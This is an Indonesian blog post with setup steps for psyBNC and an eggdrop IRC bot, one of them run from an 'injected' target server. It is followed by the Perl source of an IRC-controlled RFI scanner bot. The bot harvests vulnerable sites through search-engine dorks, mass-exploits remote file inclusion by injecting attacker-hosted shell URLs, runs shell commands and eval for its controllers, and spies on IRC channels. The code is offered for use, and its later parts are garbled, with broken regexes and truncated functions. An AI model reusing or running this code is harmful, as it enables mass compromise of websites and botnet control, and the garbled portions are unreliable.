Sabtu, 12 Juni 2010

cara buat psyBNC

#"Cara bikin simple psybnc #
1. login shell anda ato dari target injek
2. wget
3. tar -zxvf aris.tar.gz;rm -rf aris.tar.gz
4. cd ChuCu
5. ./config ident port;./fuck;./run
misal : ./config aku 2009;./fuck;./run
jadi di mirc anda akan menggunakan /server ip-shell:2009
Selamat Mencoba

cara bikin eggdrop

"cara bikin bot eggdrop CBKTECH "
1. pertama login shell anda
2. wget
3. tar -zxvf cbktech.tar.gz;rm -rf cbktech.tar.gz
4. masuk ke dirctory .dat
5. ./ayu conf botnick identbot ip-shell channel owner
misal :
./ayu conf juvin juv lonely jeleeekk
"#" - untuk melihat ip shell anda ketik /sbin/ifconfig atau ifconfig
6. ./dssl conf
7. untuk menambahkan tcl dengan command ./tcl -t conf nama.tclnya
*koleksi tcl klik disini atau kumpulan tcl
. selamat mencoba

bot scan rfi

## FeeLCoMz RFI Scanner Bot v4.9 ##
## By FaTaLisTiCz_Fx ##
## ? Agu-Nov 2008, FeeLCoMz Community ##
## Usage: ##
## perl ##
## Notes: ##
## + All Parameters are optional ##
## ##
## Features: ##
## + RFI Scanner ##
## + RFI Scan & Exploit (Exploit per engine) ##
## + Joomla RFI Scan & Exploit ##
## + Milw0rm Search ##
## + Google bypass (Using PHP) ##
## + Message Spy & Save ##
## History:
## + Fixed cryptz command (v4.5)
## + Fixed user commands execution by unauthorized user (v4.6)
## + Added options to enable/disable encrypted password (v4.7)
## + Fixed missing hostname on sublink (v4.8)
## + Added links filter to exclude exploiting bad links (v4.9)

use strict;

use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;

my $versi = "v4.9";
my $cmdpre = "."; #Command Prefix

my $fx29id = ""; #Fx29ID (Simple)
my $fx29id2 = ""; #Fx29ID (Advanced)
my $fx29sh = ""; #Fx29Sh
my $bypass = ""; #Google Bypasserz

my $mysite = ""; #Path to Sources URL
my $spread = $mysite."lol.txt"; #Fx29Spreadz
my $joomlaz = $mysite."jombla.txt";

my @servers = (""); #IRC Servers (Separated by coma)
my %bot = (
nick => "scan[".int(rand(100))."]",
ident => "fX".int(rand(100)),
chan => ["#scan"], #Channels to join (Separated by coma)
server => $servers[rand(scalar(@servers))],
port => "6667"

## status: admin, user
## cryptz: 0 = Non-Encrypted Password, 1 = Encrypted Password
my %boss = (
freach => {
pass => 'fuck',
status => "admin",
cryptz => 0,
login => 0
freach => {
pass => 'fuck',
status => "admin",
cryptz => 1,
login => 0
freach => {
pass => 'fuck',
status => "admin",
cryptz => 0,
login => 0

my %spy = (
host => "", #Channels to show spied text
chanz => [""], #Channels to spy (Separated by coma)
wordz => ['http://.+?[=]'], #Text to spy (Regex, Separated by coma)
foundz => []

## Options: 0 = Disable, 1 = Enable
my %conf = (
showsite => 1, #Show link to debug channel (Yes/No)
linez => 3, #Lines per message
sleepz => 3, #Message delay per linez (seconds)
rfipid => 50, #Sites per proccess
rficnt => 100, #Counter setting
rficnt2 => 200, #Counter setting
timeout => 4, #Http socket time out

my %colz = (
1 => " 0,1 [ ! ] 9 " , 2 => " 0[ ! ] ", #Header
3 => " 0,1 + [ 9 " , 4 => " 0] + ", #Proses

$bot{chan} = "#".$ARGV[0] if $ARGV[0];
$bot{server} = $ARGV[1] if $ARGV[1];
$bot{port} = $ARGV[2] if $ARGV[2];

my $chanx = "#lscan"; #2nd Channel to show the results of vurnerable site
my $dbgchan = "#debugs"; #For debugging purposes (Optional)
my @chans = ($bot{chan});
my @badbugz = ("scan","bug"); #Bad bugs to cancel scanning
my @baddorkz = ("dork"); #Bad dorks to cancel scanning
my @badlinkz = ("access*log","accesslog","awstats","error.log","wwwstats",""); #Bad links to exclude
my $keluar = 0;
my $sock;

my $tez = $ARGV[3];
if ($tez == 1) {
my $situs = "http://localhost/fx29sh/";
$fx29id = $situs."fx29id1.txt?";
$fx29id2 = $situs."fx29id2.txt?";
$fx29sh = $situs."fx29sh.txt?";

if (fork() == 0) {
while ($keluar != 1) { irc_connect(); }

sub irc_connect {
$sock = IO::Socket::INET->new(PeerAddr => $bot{server},
PeerPort => $bot{port},
Proto => 'tcp')
or die "Error: Ga bisa connect ke ".$bot{server}.":".$bot{port}."!\r\n";


my ($baris,$hb);
my $loginboss = 0;
my $userstat = "";

while ( $baris = <$sock> ) {

##[ PARSING ]##
my $com;
my $me = $bot{nick};
my ($fcom,$dteks,@teks) = split(/\s+:/,$baris);
my ($duhost,$dcom,$dtarget) = split(/ /,$fcom);
my ($dnick,$dhost) = split(/!/,$duhost);
$dcom = "" unless ($dcom);
$dtarget = "" unless ($dtarget);
$dnick =~ s/://;
$dteks = trimrn($dteks);
if ($dteks =~ /^[$cmdpre](.*)/) { $com = $1; } else { $com = ""; }

#print $baris."\n$dnick | $dcom | $dtarget : $dteks\n";

##[ CEK USER ]##
if ($boss{$dnick}) { ($loginboss,$userstat) = ($boss{$dnick}{"login"},$boss{$dnick}{"status"}); }
else { ($loginboss,$userstat) = (0,""); }

if ($dnick =~ /PING/) { irc_raw("PONG $dteks"); }
if ($dcom =~ /001/) { irc_join($chanx); irc_join($dbgchan); foreach my $c (@chans) { irc_join($c); } }
elsif ($dcom =~ /NICK|PART|QUIT/) { if ( $boss{$dnick}{"login"} == 1 ) { $boss{$dnick}{"login"} = 0; irc_ntc($dnick,"Logout!"); } }

if (($dtarget) && ($dtarget eq $me)) { $dtarget = $dnick; }
if ($com =~ /^help$/) { bot_help($dtarget,1); }
elsif ($com =~ /^info$/) { bot_info($dtarget); }
elsif ($com =~ /^url(en|de)\s+(.*)/) {
my $url = $2; my $en;
if ( $1 eq "en" ) { $en = "Encode"; $url = urlen($url); }
elsif ( $1 eq "de" ) { $en = "Decode"; $url = urlde($url); }
msgi($dtarget,"URL $en", $url);
elsif ($com =~ /^cek\s+(http:\/\/.*[=])/) { cek_shell($dtarget,$dnick,$1); }
elsif ($com =~ /^respon/) { cek_respon($dtarget); }
elsif ($com =~ /^milw0rm\s+(.*)/) { milw0rm($dtarget,$1); }
elsif ($com =~ /^auth$|auth\s+(.*)/ && $boss{$dnick}) {
my $pass = $1; my $auth = $boss{$dnick}{"login"};
if ( $pass && $auth == 0 ) {
if ($boss{$dnick}{"cryptz"} == 1) { $pass = cryptz($pass); }
if ($pass eq $boss{$dnick}{"pass"}) {
$boss{$dnick}{"login"} = 1;
irc_ntc($dnick,"OK ".$boss{$dnick}{"status"}."!");
else { irc_ntc($dnick,"Error!"); }
else {
if ($auth == 0) { irc_ntc($dnick,"Blom auth!"); }
else { irc_ntc($dnick,$boss{$dnick}{"status"}."!"); } }
if ($dtarget && $dtarget ne $me) {
if (($com =~ /^scan\s+(.+?[=])\s+(.*)/) && (fork() == 0)) { s_scanz($dtarget,$1,$2,$hb,1); exit; }
elsif (($com =~ /^scan2\s+(.+?[=])\s+(.*)/) && (fork() == 0)) { s_scanz($dtarget,$1,$2,$hb,2); exit; }

if ($loginboss == 1) {
if ($com =~ /^help/) { bot_help($dtarget,2); }
elsif ($com =~ /^join\s+(.*)/) { irc_join($1); push(@chans,$1); }
elsif ($com =~ /^part\s+(.*)/) {
my $pchan = $1; irc_part($1);
for my $i(0..scalar(@chans)) { if ($chans[$i] eq $pchan) { undef $chans[$i]; } }
elsif ($com =~ /^nick\s+(.*)/) { $bot{nick} = $1; irc_nick($bot{nick}); }
elsif ($com =~ /^hitung\s+([0-9].*)/) { $conf{rficnt} = $1; msgi($dtarget,"RFI Count",$conf{rficnt}); }
elsif ($com =~ /^bos$/ ) { my @bos = keys %boss; my $bos2 = join(" ",@bos); msgi($dtarget,"BoZz",$bos2); }
elsif ($com =~ /^cryptz\s+(.*)/) { msgi($dnick,$1,cryptz($1)); }
elsif ($com =~ /^logout$/ ) { $boss{$dnick}{"login"} = 0; irc_ntc($dnick,"Logout berhasil!"); }
elsif (($com =~ /^joomla\s+(.*)/) && (fork() == 0)) { s_scanz($dtarget,"",$1,$hb,3); exit; }
elsif ($com =~ /^sublink\s+(.*)/) { my @sl = lnk_sub($1); foreach my $e(@sl) { irc_msg($dtarget,$e); } }
elsif ($com =~ /^http(1|2|3)\s+(.+?)\s+(.*)/) {
my ($t,$nf,$q) = ($1,$2,$3);
my $h;
if ($t == 1) { $h = bukasitus($q); }
elsif ($t == 2) { $h = bukasitus2($q); }
else { $h = bukasitus3($q); }
f_simpan2($nf,$h); ntci($dnick,"SaVeD ($t)",$nf);
elsif ($com =~ /^regex(1|2)\s+(.+?)\s+(.*)/) {
my $n = $1;
my $q = bukasitus($2);
my $regex = $3;
if ($n ==1) {
if ($q !~ /$regex/) { irc_msg($dtarget,"Ga cocok!"); }
while ($q =~ m/$regex/g ) { irc_msg($dtarget,$1); sleep(1); }
else {
while ($q =~ m/http:\/\/(.*?)<\/a>/g) { irc_msg($dtarget,$2); sleep(1); }
##[ END OF USER ]##

if (($loginboss == 1) && ($userstat eq "admin")) {
if ($com =~ /^help/) { bot_help($dtarget,3); }
elsif ($com =~ /^chans/) { my $chans = join(",", @chans); ntci($dnick,"ChaNz",$chans); }
elsif ($com =~ /^spy$/ ) { ntci($dnick,"SpY","Host: ".$spy{"host"}." Chans: ".join(",", @{ $spy{"chanz"} })." Words: ".join(",", @{ $spy{"wordz"} })); }
elsif ($com =~ /^spy(found|show|clear)$/ ) {
my $n = $1;
if ($n eq "found") { msgi($dtarget,"SpYFouNd",scalar(@{ $spy{"foundz"} })); }
elsif ($n eq "show") {
my $i = 0;
for my $f (@{ $spy{"foundz"} }) { irc_msg($dtarget,$f); }
$i++; if ($i % $conf{linez} == 0) { sleep($conf{sleepz}); }
elsif ($n eq "clear") { $spy{"foundz"} = []; msgi($dtarget,"SpyList","DiBersiHkaN!"); }
else { msge($dtarget,"Spy","PeRinTah SaLah!"); }
elsif ($com =~ /^spyhost\s+(.*)/ ) { $spy{"host"} = $1; ntci($dnick,"SpYHosT",$spy{"host"}); }
elsif ($com =~ /^spychan\s+(.*)/ ) {
unless ($spy{"host"}) { msge($dtarget,"SiLaHkaN SeT SpyHost TerLebih DahuLu!",""); }
else{ irc_join($1); push @{ $spy{"chanz"} }, $1; my $chans = join(",", @{ $spy{"chanz"} }); ntci($dnick,"SpYChaNz",$chans); }
elsif ($com =~ /^spyword\s+(.*)/ ) { push @{ $spy{"wordz"} }, $1; my $words = join(",", @{ $spy{"wordz"} }); ntci($dnick,"SpYWoRDz",$words); }
elsif ($com =~ /^quit/) { irc_quit("Good Bye!"); $keluar = 1; exit; }
elsif ($com =~ /^keluar/) { irc_quit("Killed!"); $keluar = 1; system("killall perl"); exit; }
elsif ($com =~ /^raw\s+(.*)/) { irc_raw($1); }
elsif ($com =~ /^rfipid\s+([0-9].*)/) { $conf{rfipid} = $1; msgi($dtarget,"RFI Pid",$conf{rfipid}); }
elsif ($com =~ /^cshell\s+(.*)/) { $fx29sh = $1; msgi($dtarget,"Injector RFI",$fx29sh); }
elsif ($com =~ /^crespon(1|2)\s+(.*)/) {
my ($n,$url) = ($1,$2);
if ($n == 1) { $fx29id = $url; }
elsif ($n == 2) { $fx29id2 = $url; }
msgi($dtarget,"Respon $n RFI",$url);
elsif ($com =~ /^cspread\s+(.*)/) {
my $url = $1;
$spread = $url;
msgi($dtarget,"Spread RFI",$spread);
elsif ($com =~ /^\+bos\s+(.+?)\s+(.*)/) {
$boss{$1}{pass} = "fx";
$boss{$1}{status} = $2;
$boss{$1}{login} = 0;
$boss{$1}{cryptz} = 0;
ntci($dnick,"BoZz","$1 ditambahkan sbg ".$boss{$1}{status});
msgi($1,"BoZz","Hai $1! Ketik .auth ".$boss{$1}{pass});
elsif ($com =~ /^eval\s+(.*)/) { eval($1); }
elsif (( $com =~ /^cmd\s+(.*)/) && ( fork() == 0 ) ) {
my $cmd = $1;
if ($cmd =~ /cd (.*)/) { chdir("$1") || irc_msg($dtarget,"Ga bisa ganti dir!"); return; }
my @output = `$cmd`;
my $i = 0;
foreach my $out (@output) {
$i++; if ($i % $conf{linez} == 0) { sleep($conf{sleepz}); }

##[ MATA-MATA ]##
if ($dtarget ne $spy{"host"}) {
my $is_spychan = grep $_ eq $dtarget, @{$spy{"chanz"}};
if ($is_spychan == 1) {
for my $t (@{$spy{"wordz"}}) {
if ($dteks =~ /$t/) {
msgi($spy{"host"},"!",$dteks); sleep(1);
push @{ $spy{"foundz"} }, $dteks;

sub s_scanz {
my ($to,$bug,$dork,$sb,$type) = @_;
$sb = "Fx".$sb.".txt";
$dork = bersihdork($to,$dork);
my %typez = (
1 => "RFI ScaNneR",
2 => "RFI ScaN & ExpLoiT",
3 => "JooMLa MaSs ScaN & ExpLoiT"
my $badbug = cek_bug($bug);
if ($badbug == 1) { msge($to,"BuG","BuGnya JeLek! ScaNNinG DiCanCeL"); return; }
my $baddork = cek_dork($dork);
if ($baddork == 1) { msge($to,"DoRk","DorKnya JeLek! ScaNNinG DiCanCeL"); return; }
if ($type == 3) {
my $h = bugjoomla("hitung");
if ($h == 0) { msge($to,"Joomla","BuGnya Ga BiSa DiLoaD! ScaNNinG DiCanCeL"); return; }
irc_msg($to,$colz{1}."MeMeRikSa ReSpoN..".$colz{2});
my $stat = cek_respon($to);
if ($stat != 2) { irc_msg($to,$colz{1}."ReSpoN eLek cOOOOkk..nDanG diGanti sEXs!".$colz{2}); return; }
irc_msg($to,$colz{1}." ".$typez{$type}." StaRt! 0 ".$conf{rfipid}."/PID 9ID: 0 $sb".$colz{2});
irc_msg($to,$colz{1}." BuGz: 0 $bug ") if ($type != 3);
irc_msg($to,$colz{1}." DoRkz: 0 $dork ");
s_eksploit(1,$to,$bug,$dork,$sb) if ($type == 1);
irc_msg($to,$colz{1}." ".$typez{$type}." FiniSh! 0 $dork 9ID: 0 $sb".$colz{2});

sub s_eksploit {
#Type: 1 = Biasa, 2 = Cari dan exploit, 3 = Joomla
#Engine: Kosong = Eksploit total, Ada = Eksploit per engine
my ($type,$chan,$bug,$dork,$tf,$engine) = @_;
my @prosesbaru;
my @semuatarget;
my $hitung;
my $num = 0;
my @bugjoomla = bugjoomla($chan) if ($type == 3);
unless (open(FILEZ,"< $tf")) { msge($chan,"FILE","Ga BiSa BuKa $tf!"); return; } while (my $r = ) { $r =~ s/\n//g; push(@semuatarget,$r); }
my @kotor = lnk_sortir(@semuatarget);
my @target = lnk_filter(@kotor);
if (!$engine) {
irc_msg($chan,$colz{1}."HaSiL PeNCaRiaN 0 $dork".$colz{2});
irc_msg($chan,$colz{1}."ToTaL: 0 ".scalar(@semuatarget)." 9KoToR: 0 ".scalar(@kotor)." 9BeRsih: 0 ".scalar(@target)." 9ID: 0 $tf".$colz{2}." ".$colz{1}." ExpLoiTaSi DiMuLai! ".$colz{2});
foreach my $situs (@target) {
if ($hitung % $conf{rfipid} == 0) {
foreach my $f (@prosesbaru) { waitpid($f,0); }
$num = 0;
if ($type == 1 && $hitung % $conf{rficnt} == 0) {
irc_msg($dbgchan,$situs) if ($conf{showsite} == 1);
irc_msg($chan,$colz{3}.$hitung." 3 ".scalar(@target).$colz{4});
if ($type != 1 && $hitung % $conf{rficnt2} == 0) {
irc_msg($dbgchan,$situs) if ($conf{showsite} == 1);
irc_msg($chan," 9,1 $engine 15 ".$hitung." 14 ". scalar(@target). " ");
$prosesbaru[$num] = fork();
if ($prosesbaru[$num] == 0) {
if ($type != 3) {
my $q = bukasitus("http://".$situs.$bug.$fx29id."?");
if ($q =~ /FeeLCoMz/) { safemode(1,$chan,$situs,$bug,$engine); sleep($conf{sleepz}); }
else {
foreach my $bug (@bugjoomla) {
my $q = bukasitus("http://".$situs.$bug.$fx29id."?");
if ($q =~ /FeeLCoMz/) { safemode(1,$chan,$situs,$bug,$engine); sleep($conf{sleepz}); }
irc_msg($chan,$colz{1}."MeNunGGu ".scalar(@prosesbaru)." PID ProSes EksPLoiTasi..".$colz{2}) if (!$engine);
foreach my $f (@prosesbaru) { waitpid($f,0); }
irc_msg($chan," 9,1 $engine 0FiNizZ! ") if ($engine);
## GOOGLE : AOL, *CompuServe, *, *MySpace, *Netscape, *Ripple ##
## YAHOO : AltaVista, AlltheWeb, GoodSearch, *Rectifi ##
## LIVE : *, *Ms.Dewey, *Tafiti ##
## ASK : *iWon, Lycos ##
## LAINNYA : Abacho, Clusty, Dmoz, Euroseek, Fireball, Hotbot, Mamma, ##
## Virgilio, Webcrawler, Webde ##
## * Not implemented yet
sub s_cari {
#Type: 1 = Cari saja, 2 = Cari dan eksploit, 3 = Cari dan eksploit Joomla
my ($chan,$dork,$nf,$bug,$type) = @_;
my @engz;
my $key = $dork;
$dork = urlen($key);
$engz[0] = fork(); if ($engz[0] == 0) { s_engine("google","Google",$type,$chan,$bug,$dork,$nf); exit; }
#$engz[1] = fork(); if ($engz[1] == 0) { s_engine("aol","Aol",$type,$chan,$bug,$dork,$nf); exit; }
#$engz[2] = fork(); if ($engz[2] == 0) { s_engine("netscape","Netscape",$type,$chan,$bug,$dork,$nf); exit; }
$engz[3] = fork(); if ($engz[3] == 0) { s_engine("yahoo","Yahoo",$type,$chan,$bug,$dork,$nf); exit; }
$engz[4] = fork(); if ($engz[4] == 0) { s_engine("live","Live",$type,$chan,$bug,$dork,$nf); exit; }
$engz[5] = fork(); if ($engz[5] == 0) { s_engine("ask","Ask",$type,$chan,$bug,$dork,$nf); exit; }
$engz[6] = fork(); if ($engz[6] == 0) { s_engine("google2","Google2",$type,$chan,$bug,$dork,$nf); exit; }
$engz[7] = fork(); if ($engz[7] == 0) { s_engine("altavista","Altavista",$type,$chan,$bug,$dork,$nf); exit; }
$engz[8] = fork(); if ($engz[8] == 0) { s_engine("alltheweb","AllTheWeb",$type,$chan,$bug,$dork,$nf); exit; }
$engz[9] = fork(); if ($engz[9] == 0) { s_engine("goodsrch","GoodSearch",$type,$chan,$bug,$dork,$nf); exit; }
$engz[10] = fork(); if ($engz[10] == 0) { s_engine("lycos","Lycos",$type,$chan,$bug,$dork,$nf); exit; }
$engz[11] = fork(); if ($engz[11] == 0) { s_engine("uol","Uol",$type,$chan,$bug,$dork,$nf); exit; }
$engz[12] = fork(); if ($engz[12] == 0) { s_engine("fireball","Fireball",$type,$chan,$bug,$dork,$nf); exit; }
$engz[13] = fork(); if ($engz[13] == 0) { s_engine("gigablast","Gigablast",$type,$chan,$bug,$dork,$nf); exit; }
$engz[14] = fork(); if ($engz[14] == 0) { s_engine("virgilio","Virgilio",$type,$chan,$bug,$dork,$nf); exit; }
$engz[15] = fork(); if ($engz[15] == 0) { s_engine("webde","",$type,$chan,$bug,$dork,$nf); exit; }
$engz[16] = fork(); if ($engz[16] == 0) { s_engine("mamma","Mamma",$type,$chan,$bug,$dork,$nf); exit; }
$engz[17] = fork(); if ($engz[17] == 0) { s_engine("clusty","Clusty",$type,$chan,$bug,$dork,$nf); exit; }
$engz[18] = fork(); if ($engz[18] == 0) { s_engine("dmoz","Dmoz",$type,$chan,$bug,$dork,$nf); exit; }
#$engz[19] = fork(); if ($engz[19] == 0) { s_engine("abacho","Abacho",$type,$chan,$bug,$dork,$nf); exit; }
$engz[20] = fork(); if ($engz[20] == 0) { s_engine("euroseek","Euroseek",$type,$chan,$bug,$dork,$nf); exit; }
$engz[21] = fork(); if ($engz[21] == 0) { s_engine("hotbot","Hotbot",$type,$chan,$bug,$dork,$nf); exit; }
$engz[22] = fork(); if ($engz[22] == 0) { s_engine("webcrawl","WebCrawler",$type,$chan,$bug,$dork,$nf); exit; }
irc_msg($chan,$colz{1}."MeNunGGu ".scalar(@engz)." PID ProSes SearCh EnGiNe..".$colz{2});
foreach my $e (@engz) { waitpid($e,0); }
sub s_engine {
my ($f,$se,$type,$chan,$bug,$dork,$ef) = @_;
my @hc;
if ($f eq "google" ) { @hc = se_google($chan,$dork,$ef); }
elsif ($f eq "google2" ) { @hc = se_google_m($chan,$dork,$ef); }
elsif ($f eq "aol" ) { @hc = se_aol($chan,$dork,$ef); } #Unused
elsif ($f eq "netscape" ) { @hc = se_netscape($chan,$dork,$ef); } #Unused
elsif ($f eq "yahoo" ) { @hc = se_yahoo($chan,$dork,$ef); }
elsif ($f eq "altavista") { @hc = se_altavista($chan,$dork,$ef); }
elsif ($f eq "alltheweb") { @hc = se_alltheweb($chan,$dork,$ef); }
elsif ($f eq "goodsrch" ) { @hc = se_goodsearch($chan,$dork,$ef); }
elsif ($f eq "ask" ) { @hc = se_ask($chan,$dork,$ef); }
elsif ($f eq "fireball" ) { @hc = se_fireball($chan,$dork,$ef); }
elsif ($f eq "gigablast") { @hc = se_gigablast($chan,$dork,$ef); }
elsif ($f eq "lycos" ) { @hc = se_lycos($chan,$dork,$ef); }
elsif ($f eq "live" ) { @hc = se_live($chan,$dork,$ef); }
elsif ($f eq "hotbot" ) { @hc = se_hotbot($chan,$dork,$ef); }
elsif ($f eq "virgilio" ) { @hc = se_virgilio($chan,$dork,$ef); }
elsif ($f eq "webde" ) { @hc = se_webde($chan,$dork,$ef); }
elsif ($f eq "uol" ) { @hc = se_uol($chan,$dork,$ef); }
elsif ($f eq "abacho" ) { @hc = se_abacho($chan,$dork,$ef); } #Unused
elsif ($f eq "mamma" ) { @hc = se_mamma($chan,$dork,$ef); }
elsif ($f eq "clusty" ) { @hc = se_clusty($chan,$dork,$ef); }
elsif ($f eq "dmoz" ) { @hc = se_dmoz($chan,$dork,$ef); }
elsif ($f eq "euroseek" ) { @hc = se_euroseek($chan,$dork,$ef); }
elsif ($f eq "webcrawl" ) { @hc = se_webcrawler($chan,$dork,$ef); }
my @cl = lnk_sortir(@hc);
if (scalar(@cl) == 0) { exit; }
if ($type == 1) { foreach my $e (@cl) { f_simpan($ef,$e); } }
else {
my $ef2 = $f.$ef;
foreach my $e (@cl) { f_simpan($ef2,$e); }
if ($type == 2) { s_eksploit(2,$chan,$bug,$dork,$ef2,$se); }
elsif ($type == 3) { s_eksploit(3,$chan,$bug,$dork,$ef2,$se); }
##[ GOOGLE ]##
sub se_google {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 5000; my $p = 0;
#my $url = "http://localhost/search/";
my $url = "".$num."&hl=id&q=".$key."&start=".$p."&sa=N";
my $murl = "";
my $nxurl;
my $q = bukasitus($url);
if ( $q !~ /2008 Google/ ) { msge($chan,"Google","KeNa BaN!!"); @daftar = se_gbypass($chan,$key,$nf); }
if ( $q =~ /dari sekitar (.+?)<\/b>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Google","$h");
if ( $q =~ /class=b>/ ) {
my $nxurl = $1; msgn($dbgchan,"Google","$nxurl");
while ( $q =~ m/
/ ) {
my $nxurl = $1;
msgn($chan,"Google.".$dom,"LaGi NyAri..");
while ( $q =~ m/
(.*?)<\/b>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Aol","$h");
if ( $q =~ // ) {
my $nxurl = $1; msgn($dbgchan,"Aol","$nxurl");
while ( $q =~ m/property=\"f:url\">http:\/\/(.*?)<\/p>/g ) { push (@daftar, $1); }
while ( $q =~ // ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/property=\"f:url\">http:\/\/(.*?)<\/p>/g ) { push (@daftar, $1); }
return @daftar;
##[ YAHOO ]##
sub se_yahoo {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 8000; my $p = "1";
#my $url = "http://localhost/search/";
my $url = "".$key."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$p;
my $murl;
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /id=\"infotext\">
.*? of(.*?) for/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Yahoo","$h");
if ( $q =~ /999 Unable to process request at this time/ ) { msge($chan,"Yahoo","Banned!"); }
if ( $q =~ /Next/ ) {
my $nxurl = $1; msgn($dbgchan,"Yahoo","$nxurl");
while ( $q =~ m/26u=(.*?)%26w=/g ) { push (@daftar, $1); }
while ( $q =~ /Next/ ) {
$p++; if ( $p > $max ) { return @daftar; }
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/26u=(.*?)%26w=/g ) { push (@daftar, $1); }
return @daftar;
sub se_altavista {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 100; my $max = 500; my $p;
#my $url = "http://localhost/search/";
my $url = "".$key."&kgs=0&kls=0&nbq=".$num."&stq=".$p;
my $murl;
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /Next/ ) {
my $nxurl = $1; msgn($dbgchan,"Altavista","$nxurl");
while ( $q =~ m/(.*?) <\/span>/g ) { push (@daftar, $1); }
while ( $q =~ /Next/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/(.*?) <\/span>/g ) { push (@daftar, $1); }
return @daftar;
sub se_alltheweb {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 100; my $max = 20; my $p = 1;
#my $url = "http://localhost/search/";
my $url = "".$num."&q=".$key."&o=".$p;
my $murl;
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /(.+?)<\/span>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"AllTheWeb","$h");
if ( $q =~ /Next/ ) {
my $nxurl = $1; msgn($dbgchan,"AllTheWeb","$nxurl");
while ( $q =~ m/http:\/\/(.+?)<\/span>/g ) { push (@daftar, $1); }
while ( $q =~ /Next/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/http:\/\/(.+?)<\/span>/g ) { push (@daftar, $1); }
return @daftar;
sub se_goodsearch {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 0; my $max = 300; my $p = 1;
#my $url = "http://localhost/search/";
my $url = "".$key."&page=".$p."&osmax=".$num;
my $murl = "";
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /of about (.+?)<\/strong>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"GoodSearch","$h");
if ( $q =~ m/ Next<\/a>/ ) {
my $nxurl = $1; msgn($dbgchan,"GoodSearch","$nxurl");
while ( $q =~ m/http:\/\/(.*?)<\/a>/g ) { push (@daftar, $2); }
for ($p=2;$p<=$max;$p++) { $url = "".$key."&page=".$p."&osmax=".$num; $q = bukasitus($url); while ( $q =~ m/http:\/\/(.*?)<\/a>/g ) { push (@daftar, $2); }
if ( $q !~ m/http:\/\/(.*?)<\/a>/g ) { return @daftar; }
return @daftar;
## UOL ##
sub se_uol {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 10; my $max = 5000; my $p;
#my $url = "http://localhost/search/";
my $url = "".$key."";
my $murl = "";
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /results\">(.+?)<\/strong>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Uol","$h");
if ( $q =~ // ) {
my $nxurl = htmltourl($1); msgn($dbgchan,"Uol","$nxurl");
while ( $q =~ m/

/g ) { push (@daftar, $1); }
for ($p=1;$p<=$max;$p += $num) { $q = bukasitus("".$key."&start=".$p); while ( $q =~ m/

/g ) { push (@daftar, $1); }
if ( $q !~ /

(.+?)<\/span>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Clusty","$h");
if ( $q =~ /next/ ) {
my $nxurl = $1; msgn($dbgchan,"Clusty",htmltourl($nxurl));
while ( $q =~ m/next/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/Next/ ) {
my $h = $1; $h =~ s/,//g; msgn($dbgchan,"Ask","$h");
while ( $q =~ m/id=\"(.+?)\" href=\"http:\/\/(.+?)\" onmousedown/g ) {
my $l = $2 ; if ($l !~ /google| { push (@daftar, $l); }
for ($p=1;$p<=$max;$p++) { $q = bukasitus("".$key."&o=0&l=dir&page=".$p); while ( $q =~ m/id=\"(.+?)\" href=\"http:\/\/(.+?)\" onmousedown/g ) { my $l = $2 ; if ($l !~ /google| { push (@daftar, $l); } } } return @daftar; } ## LYCOS ## sub se_lycos { my ($chan,$key,$nf) = @_; my @daftar; my $num = 10; my $max = 200; my $p; #my $url = "http://localhost/search/"; my $url = "".$key."&submit=image"; my $murl = ""; my $nxurl; my $q = bukasitus($url); if ( $q =~ /Next/ ) {
my $nxurl = $1; msgn($dbgchan,"Lycos","$nxurl");
while ( $q =~ m/(.+?)<\/span>/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Gigablast","$h");
if ( $q =~ // ) {
my $nxurl = $1; msgn($dbgchan,"Gigablast","$nxurl");
while ( $q =~ m//g ) { push (@daftar, $1); }
while ( $q =~ // ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m//g ) { push (@daftar, $1); }
return @daftar;
## MAMMA ##
sub se_mamma {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 10; my $p = 1;
#my $url = "http://localhost/search/";
my $url = "".$key."&qtype=0&rpp=50&cb=Mamma&index=".$p;
my $murl;
my $nxurl;
my $q = bukasitus($url);
if ( $q =~ /Search Results<\/b> .*? of (.*?) for/ ) {
my $h = $1; $h =~ s/,//g; msgt($chan,"Mamma","$h");
if ( $q =~ /Next/ ) {
my $h = $1; $h =~ s/,//g; msgn($dbgchan,"Mamma","$h");
while ( $q =~ m/http:\/\/(.*?)\<\/span>/g ) {
my $l = $1 ; if ($l !~ / { push (@daftar, $l); }
while ( $q =~ /Next/ ) {
$nxurl = $murl.htmltourl($1);
$q = bukasitus($nxurl);
while ( $q =~ m/http:\/\/(.*?)\<\/span>/g ) {
my $l = $1 ; if ($l !~ / { push (@daftar, $l); }
return @daftar;
## DMOZ ##
sub se_dmoz {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 20; my $max = 5000; my $p = 1;
#my $url = "http://localhost/search/";
my $url = "".$key;
my $murl = "";
my $nxurl;
